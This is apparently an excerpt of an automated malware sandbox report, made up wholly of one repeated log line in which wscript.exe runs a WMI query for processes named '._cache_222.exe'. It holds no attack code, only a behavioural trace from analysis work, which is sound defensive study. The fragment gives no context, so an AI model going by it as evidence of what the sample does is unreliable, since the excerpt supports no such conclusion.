                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
